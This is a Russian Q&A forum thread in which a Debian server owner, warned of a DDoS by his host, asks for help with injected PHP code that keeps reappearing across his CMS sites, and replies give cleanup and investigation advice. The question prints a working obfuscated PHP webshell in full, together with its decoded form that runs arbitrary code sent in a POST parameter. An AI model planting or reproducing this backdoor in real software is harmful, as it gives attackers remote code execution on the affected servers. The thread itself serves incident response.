Вирус на Debian сервере?

Доброго времени суток.

Возникла проблема: хостер прислал письмо о том, что мой сервер участвует в DDoS.
Полез разбираться, запустил clamav, тот нашел один PHP-Trojan. Удалил.
Решил проверить руками, сделал grep -i -r 'eval', оказалось что в куче файлов различных сайтов (Joomla, WP, Livestreet) находится такой код:
if(isset($_GET[w5427t])){																																		$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);																																												}

В расшифроманном виде:
$p=@$_POST['p1'];$m=sprintf("%c",92);if(strpos($p,"$m$m")){$p=stripslashes($p);}ob_start();eval($p);$temp="document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";echo(strlen($temp)."\n".$temp);exit;


И тут началось самое интересное: я его удаляю, буквально через пару минут он появляется опять.
Возникло подозрение на какой-то вирус в самой системе.
В htop никаких подозрительных процессов нет.

Кто-нибудь сталкивался с таким? Если да, то что это и как лечить?

Заранее огромное спасибо!
  • Вопрос задан
  • 3794 просмотра
Пригласить эксперта
Ответы на вопрос 6
customtema
@customtema
arint.ru
Где обнаружен "вирус"? Если не в шкурках - можете сохранить шкурки и БД, и "переустановить" CMSки заново?
Ответ написан
BuriK666
@BuriK666
Компьютерный псих
уязвимость явно в скриптах..
ddos идет из как-того отдельного процесса, (в htop он может называться как угодно, скорее всего httpd какой-нибудь).
Ответ написан
@neol
Да постоянно такое на сайтах с необновляемыми движками. Скорее всего у вас там просто знатная дырень в коде. Ну или сперли пароли FTP, но это менее вероятно.
Вырубайте сайт (или ограничьте доступ к нему по IP), меняйте все пароли (включая админку и базу данных), удаляйте левый код (хотя лучше все-же переустановить заново по возможности), ставьте все обновления, потом включайте обратно.

По поводу DDoS: ищите странные процессы, запущенные от имени www-data или пользователей сайта (смотря как у вас все настроено).
Такие штуки любят прописываться в крон и прицеплять левые библиотеки через LD_PRELOAD к каким-нибудь безобидным утилиткам (мне попадались на /usr/bin/host).
В принципе атака может прямо из скрипта идти, тогда в статусе апача будет виден долгоживущий процесс.
Ответ написан
@skonoplich
в моем случае js скрипт подключался в index файле wordpress, что давало его присутствие на всех страницах добавление этого самого eval

вам надо сначала найти проблему а потом обычным баш скриптом подчистить файлы на своём сервер регуляркой
Ответ написан
Комментировать
sofcom
@sofcom
DevOps & IT Produce & Digital marketing
Если шаблоны для CMSок были скачаны с варезников - ищите там дырки. Если есть взломанные зазенденные расширения для CMSок - там тоже ищите дыры. Если используете Win и взломанные программы - и на своем компе тоже ищите дыры.
Ответ написан
Комментировать
gagarinq9
@gagarinq9
Дык грепните по POST в access логах мож че и перепадет.
А еще ps auxfS тоже интересно посмотреть
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы